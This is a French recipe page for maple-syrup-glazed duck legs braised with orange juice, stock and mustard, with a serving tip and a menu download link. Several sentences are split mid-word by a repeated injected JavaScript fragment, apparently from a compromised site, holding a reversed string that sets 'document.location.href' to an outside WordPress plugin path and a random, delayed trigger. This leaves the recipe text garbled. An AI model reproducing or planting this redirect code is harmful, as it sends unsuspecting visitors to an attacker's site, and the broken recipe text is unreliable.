CUISSES DE CANARD GLACÉES AU SIROP D’ÉRABLE

CUISSES DE CANARD GLACÉES AU SIROP D’ÉRABLE

Pour 4 Pers.

INGRÉDIENTS :

– 4 belles cuisses de canard
– 80ml de sirop d’érable
– 250ml de bouillon de volaille
– 1 CS de moutarde de dijon
– 375ml de jus d’orange
– sel / poivre

Enlever la peau du canard puis mélanger dans une cocotte en fonte toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tous les autres ingrédients.


Rajouter le canard dans la cocotte, porter à ébullition, couvrir et laisser frémir 2 heures à feu doux en retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tournant la viande délicatement toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toutes les 20 minutes.


Rectifier l’assaisonnement, c’est prêt !


Le petit mot de Joanne : Vous pouvez servir le canard avec une toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tombée d’épinards frais et une purée de pommes de terre au beurre et à la sauge. On peut également servir une purée à la truffe pour un accompagnement plus festif.

MENU-BE-HARMONY-NOEL-20202toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}ton” download>Télécharger

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